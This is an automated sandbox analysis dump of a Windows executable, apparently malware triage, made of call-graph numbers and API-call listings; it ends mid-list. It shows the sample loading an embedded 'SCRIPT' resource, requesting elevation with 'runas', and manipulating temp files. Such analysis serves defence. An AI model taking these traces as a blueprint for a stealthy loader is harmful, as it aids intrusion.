46479 b2f15b 46477->46479 46486 b7caeb 46478->46486 46481 b2f170 46479->46481 46483 b2f17d 46479->46483 46480 b7cb1a 46480->46299 46522 b2f18e 46481->46522 46527 b7cbf2 7 API calls 46483->46527 46486->46480 46528 b7ca89 ReadFile SetFilePointerEx 46486->46528 46529 b149bd __CxxThrowException __CxxThrowException RtlAllocateHeap 46486->46529 46487 b2f179 46487->46299 46490 b16250 46489->46490 46491 b1625f 46489->46491 46490->46283 46491->46490 46492 b16264 CloseHandle 46491->46492 46492->46490 46494 b54035 46493->46494 46495 b1575c CreateFileW 46493->46495 46496 b1577b 46494->46496 46497 b5403b CreateFileW 46494->46497 46495->46496 46496->46295 46496->46296 46497->46496 46498 b54063 46497->46498 46499 b154c6 3 API calls 46498->46499 46500 b5406e 46499->46500 46500->46496 46502 b153f3 46501->46502 46511 b153f0 46501->46511 46503 b154c6 3 API calls 46502->46503 46502->46511 46504 b15410 46503->46504 46505 b1541d 46504->46505 46506 b53f4b 46504->46506 46508 b19a40 2 API calls 46505->46508 46507 b2fa5b 3 API calls 46506->46507 46507->46511 46509 b1543f 46508->46509 46510 b154c6 3 API calls 46509->46510 46510->46511 46511->46305 46512->46303 46513->46304 46514->46310 46515->46280 46521 b154dd 46516->46521 46517 b15564 SetFilePointerEx SetFilePointerEx 46519 b15530 46517->46519 46518 b53f9c SetFilePointerEx 46519->46473 46520 b53f8b 46520->46518 46521->46517 46521->46518 46521->46519 46521->46520 46530 b2f1d8 46522->46530 46526 b2f1b2 46526->46487 46527->46487 46528->46486 46529->46486 46531 b2f1ef 46530->46531 46532 b2fddb 3 API calls 46531->46532 46533 b2f1a6 46532->46533 46534 b197b6 46533->46534 46536 b197c7 46534->46536 46537 b197fc 46536->46537 46538 b19a40 46536->46538 46537->46526 46539 b19abb 46538->46539 46543 b19a4e 46538->46543 46544 b2e40f SetFilePointerEx 46539->46544 46541 b19a7c 46541->46536 46542 b19a8c ReadFile 46542->46541 46542->46543 46543->46541 46543->46542 46544->46543 46546 b82954 46545->46546 46547 b8274e 26 API calls 46546->46547 46549 b82986 46547->46549 46548 b82a75 46548->46353 46549->46548 46572 b83017 GetTempPathW GetTempFileNameW 46549->46572 46551 b82b22 46552 b3e5eb 17 API calls 46551->46552 46553 b82b33 46552->46553 46553->46548 46554 b82792 _memcmp 46553->46554 46564 b82b57 46554->46564 46555 b82bed 46556 b3e678 23 API calls 46555->46556 46557 b82bf8 46556->46557 46558 b82bfe DeleteFileW 46557->46558 46559 b82c12 46557->46559 46558->46548 46560 b82c91 CopyFileW 46559->46560 46567 b82c18 46559->46567 46561 b82cb9 DeleteFileW 46560->46561 46562 b82ca7 DeleteFileW 46560->46562 46573 b82fd8 CreateFileW 46561->46573 46562->46548 46564->46555 46566 b3dbb3 21 API calls 46564->46566 46576 b828d2 _memcmp 46564->46576 46566->46564 46568 b822ce 36 API calls 46567->46568 46569 b82c7c 46568->46569 46569->46561 46570 b82c80 DeleteFileW 46569->46570 46570->46548 46571->46339 46572->46551 46574 b82fff SetFileTime CloseHandle 46573->46574 46575 b83013 46573->46575 46574->46575 46575->46548 46576->46564 46577->46384 46578->46383 46579->46383 46580 b490fa 46581 b49107 46580->46581 46583 b4911f 46580->46583 46593 b427ec 17 API calls __wsopen_s 46581->46593 46585 b49117 46583->46585 46586 b48c32 46583->46586 46587 b48c3e ___DestructExceptionObject 46586->46587 46588 b48c46 __wsopen_s 46587->46588 46589 b48cbb 46587->46589 46590 b48ca6 46587->46590 46588->46585 46589->46588 46592 b48d45 __fread_nolock 29 API calls 46589->46592 46594 b427ec 17 API calls __wsopen_s 46590->46594 46592->46588 46593->46585 46594->46588 46595 b52ba5 46596 b12b25 46595->46596 46597 b52baf 46595->46597 46609 b12b83 7 API calls 46596->46609 46601 b52bce 46597->46601 46606 b52be7 46597->46606 46604 b16350 3 API calls 46601->46604 46602 b12b2f 46607 b12b66 SetCurrentDirectoryW 46602->46607 46603 b52bfe GetForegroundWindow ShellExecuteW 46605 b52c26 46603->46605 46604->46606 46605->46602 46606->46603 46608 b12b7a 46607->46608 46613 b12cd4 7 API calls 46609->46613 46611 b12b2a 46612 b12c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 46611->46612 46612->46602 46613->46611 46614 b12de3 46615 b12df0 46614->46615 46616 b12e09 46615->46616 46617 b52c2b ___scrt_fastfail 46615->46617 46626 b12da5 46616->46626 46618 b52c47 GetOpenFileNameW 46617->46618 46620 b52c96 46618->46620 46622 b16b57 3 API calls 46620->46622 46621 b12e1b 46631 b144a8 46621->46631 46623 b52cab 46622->46623 46623->46623 46625 b12e31 46627 b51f50 46626->46627 46628 b12db2 GetLongPathNameW 46627->46628 46629 b16b57 3 API calls 46628->46629 46630 b12dda 46629->46630 46630->46621 46632 b14ecb 39 API calls 46631->46632 46633 b144cd 46632->46633 46634 b144e1 46633->46634 46635 b14ecb 39 API calls 46633->46635 46636 b82cf9 45 API calls 46634->46636 46638 b144e9 46634->46638 46635->46634 46637 b53848 46636->46637 46637->46638 46640 b14f39 24 API calls 46637->46640 46639 b144f5 46638->46639 46643 b53a5f 46638->46643 46645 b80b5a __CxxThrowException __CxxThrowException RtlAllocateHeap 46638->46645 46646 b1a4a1 __CxxThrowException __CxxThrowException RtlAllocateHeap 46638->46646 46639->46625 46640->46638 46641 b14f39 24 API calls 46641->46643 46643->46641 46645->46638 46646->46638 46647 b1dee5 46650 b1b710 46647->46650 46649 b1def3 46651 b1b72b 46650->46651 46653 b60102 46651->46653 46663 b1b750 pre_c_initialization 46651->46663 46661 b1ba20 46653->46661 46670 b961d0 110 API calls 2 library calls 46653->46670 46661->46649 46662 b1ec40 110 API calls 46662->46663 46663->46661 46663->46662 46664 b1a81b VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 46663->46664 46665 b2a01b 110 API calls 46663->46665 46666 b30242 5 API calls __Init_thread_wait 46663->46666 46667 b2edcd __CxxThrowException __CxxThrowException RtlAllocateHeap 46663->46667 46668 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 46663->46668 46669 b2e5ca 110 API calls 46663->46669 46671 b1aceb VariantClear 46663->46671 46664->46663 46665->46663 46666->46663 46667->46663 46668->46663 46669->46663 46670->46661 46671->46663 46672 b11044 46675 b110f3 46672->46675 46674 b1104a pre_c_initialization 46676 b11129 46675->46676 46677 b1a961 3 API calls 46676->46677 46678 b11174 46677->46678 46679 b1a961 3 API calls 46678->46679 46680 b1117e 46679->46680 46681 b1a961 3 API calls 46680->46681 46682 b11188 46681->46682 46683 b1a961 3 API calls 46682->46683 46684 b111c6 46683->46684 46685 b1a961 3 API calls 46684->46685 46686 b11292 46685->46686 46687 b1a961 3 API calls 46686->46687 46688 b112ce 46687->46688 46689 b11325 GetStdHandle 46688->46689 46690 b52485 46689->46690 46691 b1137a 46689->46691 46690->46691 46692 b5248e 46690->46692 46694 b11387 OleInitialize 46691->46694 46693 b2fddb 3 API calls 46692->46693 46695 b52495 46693->46695 46694->46674 46700 b8011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 46695->46700 46697 b5249e 46701 b80944 CreateThread 46697->46701 46699 b524aa CloseHandle 46699->46691 46700->46697 46701->46699 46702 b8092a 6 API calls 46701->46702 46703 b62a00 46718 b1d7b0 46703->46718 46704 b1db11 PeekMessageW 46704->46718 46705 b1d807 GetInputState 46705->46704 46705->46718 46706 b1d9d5 46707 b61cbe TranslateAcceleratorW 46707->46718 46709 b1db8f PeekMessageW 46709->46718 46710 b1da04 timeGetTime 46710->46718 46711 b1db73 TranslateMessage DispatchMessageW 46711->46709 46712 b1dbaf Sleep 46726 b1dbc0 46712->46726 46713 b62b74 Sleep 46713->46726 46714 b61dda timeGetTime 46771 b2e300 CharUpperBuffW 46714->46771 46715 b2e551 timeGetTime 46715->46726 46717 b62c0b GetExitCodeProcess 46721 b62c37 CloseHandle 46717->46721 46722 b62c21 WaitForSingleObject 46717->46722 46718->46704 46718->46705 46718->46706 46718->46707 46718->46709 46718->46710 46718->46711 46718->46712 46718->46713 46718->46714 46728 b1ec40 110 API calls 46718->46728 46730 b21310 110 API calls 46718->46730 46731 b1dfd0 46718->46731 46752 b1bf40 46718->46752 46770 b2edf6 IsDialogMessageW GetClassLongW 46718->46770 46719 ba29bf GetForegroundWindow 46719->46726 46720 b62742 46723 b6274a 46720->46723 46721->46726 46722->46718 46722->46721 46724 b62c92 Sleep 46724->46718 46726->46715 46726->46717 46726->46718 46726->46719 46726->46720 46726->46724 46772 b7e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 46726->46772 46728->46718 46730->46718 46733 b1e010 46731->46733 46732 b62f7a 46734 b1ec40 110 API calls 46732->46734 46733->46732 46735 b1e075 46733->46735 46747 b1e0dc pre_c_initialization 46734->46747 46735->46747 46775 b30242 5 API calls __Init_thread_wait 46735->46775 46738 b62fca 46740 b1a961 3 API calls 46738->46740 46738->46747 46739 b1a961 3 API calls 46739->46747 46741 b62fe4 pre_c_initialization 46740->46741 46776 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 46741->46776 46746 b1ec40 110 API calls 46746->46747 46747->46739 46747->46746 46748 b204f0 __CxxThrowException __CxxThrowException RtlAllocateHeap 46747->46748 46749 b1e3e1 46747->46749 46773 b1a81b VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 46747->46773 46774 b2a308 110 API calls 46747->46774 46777 b30242 5 API calls __Init_thread_wait 46747->46777 46778 b301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 46747->46778 46779 b947d4 114 API calls 46747->46779 46780 b968c1 110 API calls 46747->46780 46748->46747 46749->46718 46781 b1adf0 46752->46781 46754 b1c335 46754->46718 46756 b1bf9d 46756->46754 46757 b1ec40 110 API calls 46756->46757 46758 b608a5 46756->46758 46764 b2fddb __CxxThrowException __CxxThrowException RtlAllocateHeap 46756->46764 46765 b1c237 46756->46765 46785 b1ad81 46756->46785 46793 b1a993 VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 46756->46793 46794 b1aceb VariantClear 46756->46794 46757->46756 46759 b1ec40 110 API calls 46758->46759 46760 b608cf 46759->46760 46760->46754 46795 b1a81b VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 46760->46795 46764->46756 46766 b60976 46765->46766 46768 b1c297 46765->46768 46796 b1aceb VariantClear 46766->46796 46768->46754 46792 b1aceb VariantClear 46768->46792 46770->46718 46771->46718 46772->46726 46773->46747 46774->46747 46775->46738 46776->46747 46777->46747 46778->46747 46779->46747 46780->46747 46782 b1ae01 46781->46782 46784 b1ae1c 46781->46784 46783 b1ae09 CharUpperBuffW 46782->46783 46783->46784 46784->46756 46786 b1ad92 46785->46786 46787 b5fadb 46785->46787 46788 b2fddb 3 API calls 46786->46788 46789 b1ad99 46788->46789 46797 b1adcd 46789->46797 46792->46754 46793->46756 46794->46756 46795->46754 46796->46754 46800 b1addd 46797->46800 46798 b1adb6 46798->46756 46799 b2fddb 3 API calls 46799->46800 46800->46798 46800->46799 46801 b1a961 3 API calls 46800->46801 46802 b1adcd 3 API calls 46800->46802 46801->46800 46802->46800 46803 b48402 46808 b481be 46803->46808 46806 b4842a 46811 b481ef try_get_first_available_module 46808->46811 46810 b48343 46810->46806 46812 b50984 46810->46812 46811->46810 46815 b427ec 17 API calls __wsopen_s 46811->46815 46816 b50081 46812->46816 46814 b5099f 46814->46806 46815->46810 46818 b5008d ___DestructExceptionObject 46816->46818 46817 b5009b 46847 b427ec 17 API calls __wsopen_s 46817->46847 46818->46817 46819 b500d4 46818->46819 46823 b5065b 46819->46823 46822 b500aa __wsopen_s 46822->46814 46848 b5042f 46823->46848 46825 b50678 46828 b5068d 46825->46828 46860 b5039a CreateFileW 46825->46860 46827 b50781 GetFileType 46830 b5078c GetLastError __dosmaperr CloseHandle 46827->46830 46833 b507d3 46827->46833 46828->46822 46829 b50756 GetLastError __dosmaperr 46829->46828 46830->46828 46846 b507c3 46830->46846 46831 b50704 46831->46827 46831->46829 46861 b5039a CreateFileW 46831->46861 46835 b50840 46833->46835 46862 b505ab 29 API calls __fread_nolock 46833->46862 46834 b50749 46834->46827 46834->46829 46839 b5086d 46835->46839 46863 b5014d 32 API calls 2 library calls 46835->46863 46838 b50866 46838->46839 46840 b5087e 46838->46840 46841 b486ae __wsopen_s 3 API calls 46839->46841 46840->46828 46842 b508fc CloseHandle 46840->46842 46841->46828 46864 b5039a CreateFileW 46842->46864 46844 b50927 46845 b50931 GetLastError __dosmaperr 46844->46845 46844->46846 46845->46846 46846->46828 46847->46822 46849 b5046a 46848->46849 46851 b50450 46848->46851 46865 b503bf 46849->46865 46851->46849 46870 b427ec 17 API calls __wsopen_s 46851->46870 46853 b504d1 46855 b5059e 46853->46855 46858 b50524 46853->46858 46854 b504a2 46854->46853 46871 b427ec 17 API calls __wsopen_s 46854->46871 46872 b427fc 11 API calls _abort 46855->46872 46858->46825 46859 b505aa 46860->46831 46861->46834 46862->46835 46863->46838 46864->46844 46867 b503d7 46865->46867 46866 b503f2 46866->46854 46867->46866 46873 b427ec 17 API calls __wsopen_s 46867->46873 46869 b50421 46869->46854 46870->46849 46871->46853 46872->46859 46873->46869 46874 b303e9 46877 b309d5 SetUnhandledExceptionFilter 46874->46877 46876 b303ee pre_c_initialization 46877->46876 46878 b11cad SystemParametersInfoW

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 233 b142de-b1434d call b1a961 GetVersionExW call b16b57 238 b53617-b5362a 233->238 239 b14353 233->239 241 b5362b-b5362f 238->241 240 b14355-b14357 239->240 242 b53656 240->242 243 b1435d-b143bc call b193b2 call b137a0 240->243 244 b53631 241->244 245 b53632-b5363e 241->245 249 b5365d-b53660 242->249 262 b143c2-b143c4 243->262 263 b537df-b537e6 243->263 244->245 245->241 246 b53640-b53642 245->246 246->240 248 b53648-b5364f 246->248 248->238 251 b53651 248->251 252 b53666-b536a8 249->252 253 b1441b-b14435 GetCurrentProcess IsWow64Process 249->253 251->242 252->253 257 b536ae-b536b1 252->257 255 b14494-b1449a 253->255 256 b14437 253->256 259 b1443d-b14449 255->259 256->259 260 b536b3-b536bd 257->260 261 b536db-b536e5 257->261 264 b53824-b53828 GetSystemInfo 259->264 265 b1444f-b1445e LoadLibraryA 259->265 266 b536bf-b536c5 260->266 267 b536ca-b536d6 260->267 269 b536e7-b536f3 261->269 270 b536f8-b53702 261->270 262->249 268 b143ca-b143dd 262->268 271 b53806-b53809 263->271 272 b537e8 263->272 275 b14460-b1446e GetProcAddress 265->275 276 b1449c-b144a6 GetSystemInfo 265->276 266->253 267->253 277 b143e3-b143e5 268->277 278 b53726-b5372f 268->278 269->253 280 b53715-b53721 270->280 281 b53704-b53710 270->281 273 b537f4-b537fc 271->273 274 b5380b-b5381a 271->274 279 b537ee 272->279 273->271 274->279 284 b5381c-b53822 274->284 275->276 285 b14470-b14474 GetNativeSystemInfo 275->285 286 b14476-b14478 276->286 287 b5374d-b53762 277->287 288 b143eb-b143ee 277->288 282 b53731-b53737 278->282 283 b5373c-b53748 278->283 279->273 280->253 281->253 282->253 283->253 284->273 285->286 291 b14481-b14493 286->291 292 b1447a-b1447b FreeLibrary 286->292 289 b53764-b5376a 287->289 290 b5376f-b5377b 287->290 293 b53791-b53794 288->293 294 b143f4-b1440f 288->294 289->253 290->253 292->291 293->253 297 b5379a-b537c1 293->297 295 b14415 294->295 296 b53780-b5378c 294->296 295->253 296->253 298 b537c3-b537c9 297->298 299 b537ce-b537da 297->299 298->253 299->253
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00B1430D
                                                  • Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A
                                                • GetCurrentProcess.KERNEL32(?,00BACB64,00000000,?,?), ref: 00B14422
                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00B14429
                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14454
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00B14466
                                                • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00B14474
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1447B
                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00B144A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                • API String ID: 3290436268-3101561225
                                                • Opcode ID: 4c16fe71ac23f2e46e223447bf36fac264a4d11c0f3d94792fb42cb886c07d9d
                                                • Instruction ID: 6369642d8ab385cf677cd03f13274e2f72384d0ab2ffc9bec6e08734c30776d6
                                                • Opcode Fuzzy Hash: 4c16fe71ac23f2e46e223447bf36fac264a4d11c0f3d94792fb42cb886c07d9d
                                                • Instruction Fuzzy Hash: 34A1607690A2C0EFC712C76D78C16D97FE4AB26B41B784CD9D4819BB22DE344948CB39
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 598 b142a2-b142ba CreateStreamOnHGlobal 599 b142da-b142dd 598->599 600 b142bc-b142d3 FindResourceExW 598->600 601 b142d9 600->601 602 b535ba-b535c9 LoadResource 600->602 601->599 602->601 603 b535cf-b535dd SizeofResource 602->603 603->601 604 b535e3-b535ee LockResource 603->604 604->601 605 b535f4-b53612 604->605 605->601
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B142B2
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B150AA,?,?,00000000,00000000), ref: 00B142C9
                                                • LoadResource.KERNEL32(?,00000000,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20), ref: 00B535BE
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20), ref: 00B535D3
                                                • LockResource.KERNEL32(00B150AA,?,?,00B150AA,?,?,00000000,00000000,?,?,?,?,?,?,00B14F20,?), ref: 00B535E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: acb7319d34e486258d5a555f20d52df5bfd0bf03c8212fc2a20e66e958fc2318
                                                • Instruction ID: 78df37bdc10f892175851b1824b9bd8c0148887432cc39f02989253c644ed393
                                                • Opcode Fuzzy Hash: acb7319d34e486258d5a555f20d52df5bfd0bf03c8212fc2a20e66e958fc2318
                                                • Instruction Fuzzy Hash: BB117C70200700BFDB218B65DC49F677BFAEBC6B51F2081A9B402D6260DB71D8448A60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B12B6B
                                                  • Part of subcall function 00B13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BE1418,?,00B12E7F,?,?,?,00000000), ref: 00B13A78
                                                  • Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD
                                                • GetForegroundWindow.USER32 ref: 00B52C10
                                                • ShellExecuteW.SHELL32(00000000,?,?,00BD2224), ref: 00B52C17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                • String ID: runas
                                                • API String ID: 448630720-4000483414
                                                • Opcode ID: 790cf6a7758457f89be1a06ffbacfd327d52f9226b8e99b6a31a198b954bd989
                                                • Instruction ID: b432d04867aa5a223fad9aff72006a019f49a2f1eb2dcd30593716193d848142
                                                • Opcode Fuzzy Hash: 790cf6a7758457f89be1a06ffbacfd327d52f9226b8e99b6a31a198b954bd989
                                                • Instruction Fuzzy Hash: 9911E7311083815AC714FF24D8929FEBBE4DF96750F9404EDF182031A2DF318AC98712
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • lstrlenW.KERNEL32(?,00B55222), ref: 00B7DBCE
                                                • GetFileAttributesW.KERNEL32(?), ref: 00B7DBDD
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B7DBEE
                                                • FindClose.KERNEL32(00000000), ref: 00B7DBFA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                • String ID:
                                                • API String ID: 2695905019-0
                                                • Opcode ID: f3dd802baf48b0f9edc646b737c2302916ecb6fce9808e67cdb5d89108e60c0d
                                                • Instruction ID: 520dd929acc1dba05a4145ea9be0ffbf02f92445d4c81bed116e1358d09c6f72
                                                • Opcode Fuzzy Hash: f3dd802baf48b0f9edc646b737c2302916ecb6fce9808e67cdb5d89108e60c0d
                                                • Instruction Fuzzy Hash: 93F0A030810A106782216F78AC0E8AA3BBCDE02374B108B82F83AC20E0EFB05D548695
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,00B3E505), ref: 00B4337E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem
                                                • String ID: GetSystemTimePreciseAsFileTime
                                                • API String ID: 2086374402-595813830
                                                • Opcode ID: 21e895dce092d4b5b893eb4d7bb27ef2a0b2812adb6191dc270535bdfa8b3cf7
                                                • Instruction ID: 2fdf46b1921328d84a1d3a32d7dbdbbedbcdd2529e36fa2ad3fb54658d862e11
                                                • Opcode Fuzzy Hash: 21e895dce092d4b5b893eb4d7bb27ef2a0b2812adb6191dc270535bdfa8b3cf7
                                                • Instruction Fuzzy Hash: ADE0E531A41218ABD710AF649C0397EBFE0DF45F50B9402D9FC059B661DE710E00A6D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00B309DA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 156338d0d4de17679a556796471687ac4ce182f7c29a26945a547b45c1f38e48
                                                • Instruction ID: 5f11b6b0f14a24a4ae6ef74b93e8397ff7d956d41246ea05fd8d765126a6290a
                                                • Opcode Fuzzy Hash: 156338d0d4de17679a556796471687ac4ce182f7c29a26945a547b45c1f38e48
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetInputState.USER32 ref: 00B1D807
                                                • timeGetTime.WINMM ref: 00B1DA07
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B1DB28
                                                • TranslateMessage.USER32(?), ref: 00B1DB7B
                                                • DispatchMessageW.USER32(?), ref: 00B1DB89
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B1DB9F
                                                • Sleep.KERNEL32(0000000A), ref: 00B1DBB1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                • String ID:
                                                • API String ID: 2189390790-0
                                                • Opcode ID: 9bcdd257ceebe3ddcc9faebe35b11424cb4731a5810a529f8ae8040ee8800cd9
                                                • Instruction ID: 56d2698c27d50ce6be769ee6371ab906f198e6c649a67e9ef4edf4deef57c187
                                                • Opcode Fuzzy Hash: 9bcdd257ceebe3ddcc9faebe35b11424cb4731a5810a529f8ae8040ee8800cd9
                                                • Instruction Fuzzy Hash: 0542E530608741DFE724CF24C885BAAB7E5FF45304F944AADE5568B291DB74E884CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32 ref: 00B12D07
                                                • RegisterClassExW.USER32(00000030), ref: 00B12D31
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B12D42
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00B12D5F
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B12D6F
                                                • LoadIconW.USER32 ref: 00B12D85
